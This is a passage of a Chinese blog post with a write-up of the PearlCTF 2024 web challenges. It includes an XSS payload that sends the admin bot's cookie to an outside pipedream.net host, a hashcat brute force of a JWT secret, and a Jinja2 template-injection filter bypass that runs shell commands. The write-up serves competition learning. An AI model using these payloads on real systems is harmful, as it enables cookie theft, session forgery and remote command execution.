<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="teamName: Ciallo～(∠・ω&lt; )⌒☆ rank: #6 points:  7575 Reversing: 1474&#x2F;7575 Miscellaneous: 438&#x2F;7575 Crypto: 1,248&#x2F;7575 Forensics: 904&#x2F;7575 Web: 1169&#x2F;7575 Blockchain: 788&#x2F;7">
<meta property="og:type" content="article">
<meta property="og:title" content="prealCTF2024 wp">
<meta property="og:url" content="http://example.com/2024/07/14/prealCTF2024-wp/index.html">
<meta property="og:site_name" content="oSthing&#39;s Blog">
<meta property="og:description" content="teamName: Ciallo～(∠・ω&lt; )⌒☆ rank: #6 points:  7575 Reversing: 1474&#x2F;7575 Miscellaneous: 438&#x2F;7575 Crypto: 1,248&#x2F;7575 Forensics: 904&#x2F;7575 Web: 1169&#x2F;7575 Blockchain: 788&#x2F;7">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/tucao.png">
<meta property="article:published_time" content="2024-07-14T05:13:47.000Z">
<meta property="article:modified_time" content="2024-07-22T23:26:22.351Z">
<meta property="article:author" content="oSthing">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/tucao.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>prealCTF2024 wp</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/oSthing">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/07/14/osu-gamingCTF2024-wp/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/07/14/%E4%BB%8E%E5%9B%BD%E8%B5%9B%E6%83%B3%E5%88%B0%E7%9A%84%E4%B8%80%E4%BA%9Bphp%E7%BB%95%E8%BF%87%E6%B3%A8%E9%87%8A%E7%AC%A6trick/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/07/14/prealCTF2024-wp/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/07/14/prealCTF2024-wp/&text=prealCTF2024 wp"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/07/14/prealCTF2024-wp/&is_video=false&description=prealCTF2024 wp"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=prealCTF2024 wp&body=Check out this article: http://example.com/2024/07/14/prealCTF2024-wp/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/07/14/prealCTF2024-wp/&title=prealCTF2024 wp"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/07/14/prealCTF2024-wp/&name=prealCTF2024 wp&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/07/14/prealCTF2024-wp/&t=prealCTF2024 wp"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#learn-HTTP-76-Solves-50-Points"><span class="toc-number">1.</span> <span class="toc-text">learn HTTP(76 Solves&#x2F;50 Points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#I-am-a-web-noob-75-Solves-50-Points"><span class="toc-number">2.</span> <span class="toc-text">I am a web-noob(75 Solves&#x2F;50 Points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rabbithole-58-Solves-94-points"><span class="toc-number">3.</span> <span class="toc-text">rabbithole(58 Solves&#x2F;94 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#learn-HTTP-better-15-Solves-476-Points"><span class="toc-number">4.</span> <span class="toc-text">learn HTTP better(15 Solves&#x2F;476 Points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Uploader-5-Solves-499-Points"><span class="toc-number">5.</span> <span class="toc-text">Uploader(5 Solves&#x2F;499 Points)</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        prealCTF2024 wp
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">oSthing</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-07-14T05:13:47.000Z" class="dt-published" itemprop="datePublished">2024-07-14</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/ctf/" rel="tag">ctf</a>, <a class="p-category" href="/tags/wp/" rel="tag">wp</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <blockquote>
<p>teamName: Ciallo～(∠・ω&lt; )⌒☆</p>
<p>rank: #6</p>
<p>points:  7575</p>
<p>Reversing: 1474&#x2F;7575</p>
<p>Miscellaneous: 438&#x2F;7575</p>
<p>Crypto: 1,248&#x2F;7575</p>
<p>Forensics: 904&#x2F;7575</p>
<p>Web: 1169&#x2F;7575</p>
<p>Blockchain: 788&#x2F;7575</p>
<p>OSINT: 100&#x2F;7575</p>
<p>Pwn: 1454&#x2F;7575</p>
</blockquote>
<p>这次比赛收获很多，也是和一群很强的师傅打，也感受到了自己确实很菜;w;</p>
<h2 id="learn-HTTP-76-Solves-50-Points"><a href="#learn-HTTP-76-Solves-50-Points" class="headerlink" title="learn HTTP(76 Solves&#x2F;50 Points)"></a><strong>learn HTTP</strong>(76 Solves&#x2F;50 Points)</h2><p><a target="_blank" rel="noopener" href="https://learn-http.ctf.pearlctf.in/">https://learn-http.ctf.pearlctf.in</a></p>
<p>给的是一个公共靶机里面有一个机器人那大概率是xss了，题目还给了附件，先简单看一下页面，看看题目要我们干什么，里面要我们写一个类似http请求的东西，然后把生成好的payload交给机器人检查，接下来我们看一下源码</p>
<p>先看一下nodejs的源码</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//main.js</span></span><br><span class="line"><span class="built_in">require</span>(<span class="string">&#x27;dotenv&#x27;</span>).<span class="title function_">config</span>()</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> childProcess = <span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>);</span><br><span class="line"><span class="keyword">var</span> jwt = <span class="built_in">require</span>(<span class="string">&#x27;jsonwebtoken&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&quot;express&quot;</span>)</span><br><span class="line"><span class="keyword">const</span> path = <span class="built_in">require</span>(<span class="string">&quot;path&quot;</span>)</span><br><span class="line"><span class="keyword">const</span> bodyParser = <span class="built_in">require</span>(<span class="string">&quot;body-parser&quot;</span>)</span><br><span class="line"><span class="keyword">var</span> cookieParser = <span class="built_in">require</span>(<span class="string">&#x27;cookie-parser&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>()</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">use</span>(express.<span class="title function_">static</span>(path.<span class="title function_">join</span>(__dirname, <span class="string">&#x27;public&#x27;</span>)))</span><br><span class="line">app.<span class="title function_">use</span>(bodyParser.<span class="title function_">urlencoded</span>(&#123; <span class="attr">extended</span>: <span class="literal">false</span> &#125;))</span><br><span class="line">app.<span class="title function_">use</span>(<span class="title function_">cookieParser</span>())</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    res.<span class="title function_">sendFile</span>(path.<span class="title function_">join</span>(__dirname, <span class="string">&quot;templates/index.html&quot;</span>))</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="title function_">genToken</span> = (<span class="params"></span>) =&gt; &#123;</span><br><span class="line">    <span class="keyword">var</span> token = jwt.<span class="title function_">sign</span>(&#123; <span class="attr">id</span>: <span class="number">1</span> &#125;, process.<span class="property">env</span>.<span class="property">SECRET</span>);</span><br><span class="line">    <span class="keyword">return</span> token</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&quot;/check&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">let</span> req_body = req.<span class="property">body</span>.<span class="property">body</span></span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span> (req_body == <span class="literal">undefined</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">200</span>).<span class="title function_">send</span>(<span class="string">&quot;Body is not provided&quot;</span>)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">let</span> to_req = <span class="string">`http://localhost:5001/resp?body=<span class="subst">$&#123;<span class="built_in">encodeURIComponent</span>(req_body)&#125;</span>`</span></span><br><span class="line"></span><br><span class="line">        childProcess.<span class="title function_">spawn</span>(<span class="string">&#x27;node&#x27;</span>, [<span class="string">&#x27;./bot.js&#x27;</span>, <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(&#123;</span><br><span class="line">            <span class="attr">url</span>: to_req,</span><br><span class="line">            <span class="attr">token</span>: <span class="title function_">genToken</span>()</span><br><span class="line">        &#125;)]);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">200</span>).<span class="title function_">send</span>(<span class="string">&quot;Admin will check!&quot;</span>)</span><br><span class="line">    &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(e)</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">500</span>).<span class="title function_">send</span>(<span class="string">&quot;Internal Server Error&quot;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/flag&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">let</span> token = req.<span class="property">cookies</span>.<span class="property">token</span></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">var</span> decoded = jwt.<span class="title function_">verify</span>(token, process.<span class="property">env</span>.<span class="property">SECRET</span>)</span><br><span class="line">        <span class="keyword">if</span> (decoded.<span class="property">id</span> != <span class="number">2</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">200</span>).<span class="title function_">send</span>(<span class="string">&quot;You are not verified&quot;</span>)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">200</span>).<span class="title function_">send</span>(process.<span class="property">env</span>.<span class="property">FLAG</span>)</span><br><span class="line">    &#125; <span class="keyword">catch</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">200</span>).<span class="title function_">send</span>(<span class="string">&quot;You are not verified&quot;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(<span class="string">&quot;5000&quot;</span>, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;Server started&quot;</span>)</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>有三个路由，逻辑都很简单， <code>/</code>就是显示主页，<code>/check</code>检查你构造的payload，并带上cookie(token)，<code>/flag</code>检查你的token  有没有修改如果有就返回flag</p>
<p>然后我们开看看另一个go的源码</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;net&quot;</span></span><br><span class="line">	<span class="string">&quot;os&quot;</span></span><br><span class="line">	<span class="string">&quot;strings&quot;</span></span><br><span class="line">	<span class="string">&quot;net/url&quot;</span></span><br><span class="line">)</span><br><span class="line"><span class="keyword">const</span> (</span><br><span class="line">	SERVER_HOST = <span class="string">&quot;localhost&quot;</span></span><br><span class="line">	SERVER_PORT = <span class="string">&quot;5001&quot;</span></span><br><span class="line">	SERVER_TYPE = <span class="string">&quot;tcp&quot;</span></span><br><span class="line">)</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	fmt.Println(<span class="string">&quot;Server Running...&quot;</span>)</span><br><span class="line">	server, err := net.Listen(SERVER_TYPE, SERVER_HOST+<span class="string">&quot;:&quot;</span>+SERVER_PORT)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		fmt.Println(<span class="string">&quot;Error listening:&quot;</span>, err.Error())</span><br><span class="line">		os.Exit(<span class="number">1</span>)</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">defer</span> server.Close()</span><br><span class="line"></span><br><span class="line">	fmt.Println(<span class="string">&quot;Listening on &quot;</span> + SERVER_HOST + <span class="string">&quot;:&quot;</span> + SERVER_PORT)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">for</span> &#123;</span><br><span class="line">		connection, err := server.Accept()</span><br><span class="line">		<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">			fmt.Println(<span class="string">&quot;Error accepting: &quot;</span>, err.Error())</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">go</span> processClient(connection)</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">processClient</span><span class="params">(connection net.Conn)</span></span> &#123;</span><br><span class="line">	buffer := <span class="built_in">make</span>([]<span class="type">byte</span>, <span class="number">1024</span>)</span><br><span class="line">	mLen, err := connection.Read(buffer)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		fmt.Println(<span class="string">&quot;Error reading:&quot;</span>, err.Error())</span><br><span class="line">	&#125;</span><br><span class="line">	raw_http_req := strings.Split(<span class="type">string</span>(buffer[:mLen]), <span class="string">&quot;\r\n&quot;</span>)[<span class="number">0</span>]</span><br><span class="line">	splitted_req := strings.Split(raw_http_req, <span class="string">&quot; &quot;</span>)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> splitted_req[<span class="number">0</span>] != <span class="string">&quot;GET&quot;</span> &#123;</span><br><span class="line">		_, err = connection.Write([]<span class="type">byte</span>(<span class="string">&quot;HTTP/1.1 405 Method Not Allowed\r\n\r\nCan only GET&quot;</span>))</span><br><span class="line">		connection.Close()</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	parsed, err := url.Parse(splitted_req[<span class="number">1</span>])</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		fmt.Println(<span class="string">&quot;Error parsing: &quot;</span>, err.Error())</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	path := parsed.Path</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> path != <span class="string">&quot;/resp&quot;</span> &#123;</span><br><span class="line">		_, err = connection.Write([]<span class="type">byte</span>(<span class="string">&quot;HTTP/1.1 404 Not Found\r\n\r\nNot Found&quot;</span>))</span><br><span class="line">		connection.Close()</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	args, err := url.ParseQuery(parsed.RawQuery)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		_, err = connection.Write([]<span class="type">byte</span>(<span class="string">&quot;HTTP/1.1 500 Internal Server Error\r\n\r\nError&quot;</span>))</span><br><span class="line">		connection.Close()</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	body, ok := args[<span class="string">&quot;body&quot;</span>]</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> !ok &#123;</span><br><span class="line">		_, err = connection.Write([]<span class="type">byte</span>(<span class="string">&quot;HTTP/1.1 200 OK\r\n\r\nGive me some body&quot;</span>))</span><br><span class="line">		connection.Close()</span><br><span class="line">		<span class="keyword">return</span></span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	_, err = connection.Write([]<span class="type">byte</span>(body[<span class="number">0</span>]))</span><br><span class="line">	connection.Close()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>根据你的body来分割内容，先检查前面部分有没有问题，最后把最后一部分分割出来回显到网页上， 最后回显的部分没有任何过滤，先尝试一下直接打</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?body=HTTP%2F1.1%20200%20OK%0D%0A%0D%0A&lt;script&gt;alert(1)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>成功弹窗，接下来简单构造一下外带cookie就行</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?body=HTTP%2F1.1 200 OK%0D%0A%0D%0A&lt;script&gt;document.location.href=&quot;https://eopv4zbo4fy4ld3.m.pipedream.net/?x=&quot;%2bdocument.cookie&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>拿到token</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwiaWF0IjoxNzEwMjI1MDYyfQ.ucZOtlvfIFuRlGecK_0a22w5OC1lvT3himWAqgXrbS0</span><br></pre></td></tr></table></figure>

<p>直接jwt.io改还不行，还要找到<code>SECRET</code>的key改才行</p>
<p>用hashcat爆破</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -a 3 -m 16500 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwiaWF0IjoxNzEwMjI1MDYyfQ.ucZOtlvfIFuRlGecK_0a22w5OC1lvT3himWAqgXrbS0</span><br></pre></td></tr></table></figure>

<p>爆破出来密钥是 … <code>banana</code> </p>
<p>最后在jwt.io上加上密钥后修改</p>
<p>放到&#x2F;flag检查得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pearl&#123;c4nt_s3nd_th3_resP0n53_w1th0ut_Sani7iz1ng&#125;</span><br></pre></td></tr></table></figure>

<h2 id="I-am-a-web-noob-75-Solves-50-Points"><a href="#I-am-a-web-noob-75-Solves-50-Points" class="headerlink" title="I am a web-noob(75 Solves&#x2F;50 Points)"></a><strong>I am a web-noob</strong>(75 Solves&#x2F;50 Points)</h2><p><a target="_blank" rel="noopener" href="https://noob-login.ctf.pearlctf.in/">https://noob-login.ctf.pearlctf.in/</a></p>
<p>给的是一个公共靶机没有给源码，给了一个输入用户名的地方,随便数一个用户名(123)，在主页回显</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Basic 123</span><br><span class="line">Blah blah blah</span><br></pre></td></tr></table></figure>

<p>猜测是ssti传一个参</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?user=&#123;&#123;7*7&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>回显</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% set config=None%&#125;&#123;% set self=None%&#125; 7*7&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>发现连续的两个大括号被过滤掉了，随便找个不用两个大括号的payload一把梭看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?user=&#123;%print(&quot;&quot;.__class__.__bases__[0]. __subclasses__()[138].__init__.__globals__[&#x27;popen&#x27;](&#x27;whoami&#x27;).read())%&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到有回显</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% set config=None%&#125;&#123;% set self=None%&#125;&#123;%print(&quot;&quot;.__ __.__bases__[0]. __sub es__()[138].__init__.__globals__[&#x27;popen&#x27;](&#x27;whoami&#x27;).read())%&#125;</span><br></pre></td></tr></table></figure>

<p>挺多东西被过滤了，那我们用另一种思路，用<code>request.values.a</code>，在原本里面加个找个然后在传一个a里面是被过滤的内容就可以绕过了，尝试一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?user=&#123;%print%20(lipsum|attr(request.values.a))%&#125;&amp;a=__globals__</span><br></pre></td></tr></table></figure>

<p>成功回显</p>
<p>在回显里找到有os模块，用get获取，接下来就是如果有过滤就用<code>request.values.a</code>绕，或者用引号绕，最终payload就是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?user=&#123;%print%20(lipsum|attr(request.values.a)).get(&#x27;o&#x27;&#x27;s&#x27;)|attr(%22pop%22%22en%22)(%22cat /app/flag.txt%22)|attr(%22read%22)()%&#125;%&#125;</span><br><span class="line">&amp;a=__globals__</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pearl&#123;W4s_my_p4ge_s3cur3_en0ugh_f0r_y0u?&#125;</span><br></pre></td></tr></table></figure>

<h2 id="rabbithole-58-Solves-94-points"><a href="#rabbithole-58-Solves-94-points" class="headerlink" title="rabbithole(58 Solves&#x2F;94 points)"></a><strong>rabbithole</strong>(58 Solves&#x2F;94 points)</h2><p><a target="_blank" rel="noopener" href="https://rabbithole.ctf.pearlctf.in/">https://rabbithole.ctf.pearlctf.in</a></p>
<p>给了一个网页，里面什么也没有，dirmap扫一下，扫出来robots.txt访问一下</p>
<p>里面有个<code>/w0rk_h4rd</code>要我们去访问，里面说</p>
